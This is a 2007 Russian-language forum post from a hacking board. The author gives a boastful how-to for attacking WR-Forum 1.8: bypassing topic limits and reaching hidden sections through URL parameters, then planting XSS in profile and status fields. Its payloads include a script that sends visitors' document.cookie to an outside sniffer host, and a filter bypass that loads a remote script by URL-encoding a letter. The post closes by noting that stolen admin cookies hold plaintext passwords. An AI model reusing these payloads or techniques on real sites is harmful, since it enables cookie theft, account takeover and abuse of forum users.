HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9  
Старый 18.09.2007, 23:49
DCRM
Познающий
Регистрация: 12.12.2006
Сообщений: 89
С нами: 10217126

Репутация: 60
Arrow

Напишу мини-мануал-историю (надо же мне на этом форуме с чего то начинать!)

На форуме WR-Forum © 1.8 совершенно нет проверки на html у себя в подписи... да что там в подписи, вообще практически нигде нету!

Дело было где то часа в 2 ночи... думаю... проект новенький, интересный! есть раздел по JavaScript где мне могут помочь! Но тут столкнулся с неприятностью... В нужном разделе показалось сообщение:
Цитата:
Количество допустимых тем в рубрике исчерпано.
Немного обидевшись решил создать где нить в другом разделе.. и что я увидел:
Код:
index.php?fid=8&newtema=add
Дай ка думаю номер нужного раздела поставлю... и уваля! Работает! вот так и обходим ограничение тем
М... понравилось! решил поиграть с форумом)


гыгы) автор скрипта-редиска!
Код:
index.php?fid=9999&newtema=add
Далее, ввёл номер форума которого нету... и... он есть, наверно "скрытый" раздел...
index.php?fid=x
x-любая цифра

хех... ещё при добавлении сообщения можно спокойно вернуться назад и ещё раз добавить мессагу) короче оспамить легко!

А теперь самое интересное... XSS
У себя в инфе в подписи, да и в других полях анкеты делайте что хотите! =)

Хотим что бы жуткий аллерт досаждал посетителям?
Пишем у себя в статусе:
Код:
<IMG SRC=JaVaScRiPt:alert('XSS by DCRM')>
Хотите стырить куки?
Возьмём к примеру снифер:
Код:
http://s.netsec.ru/
Далее подумав, делаем так:
Код:
<script>img.src = "'http://s.netsec.ru/ваш логин.gif?'+document.cookie;"</script>
Но у автора стоит ограничение на длину сообщения... кхм... поиграем по его правилам, не долго думая сделал файлик скрипта и залил к себе на хост... => всё да ничего, но у автор форума сделал замену тексту ссылок на хреф... и это не проблема, достаточно лишь закодировать 1ю букву адреса:
Код:
<SCRIPT SRC="http://%77ww.xxx.xx/x.xx"></script>
И уваля! остаётся только ждать...

И того, это первый мой интересный взлом) спасибо за внимание!

P.s. а дальше дело техники и воображения) Админ есть... куки есть, кстати в незашифрованном виде там пассы...

Последний раз редактировалось DCRM; 18.09.2007 в 23:54..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
дефейс сайта через форум burbon Уязвимости CMS / форумов 1 20.10.2005 01:35
Надо снести ФОРУМ FUNTiK Болталка 4 09.01.2005 23:43
Дефейс 4ерез Vbulletin 3.0.3 ProTeuS Уязвимости CMS / форумов 6 25.12.2004 04:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.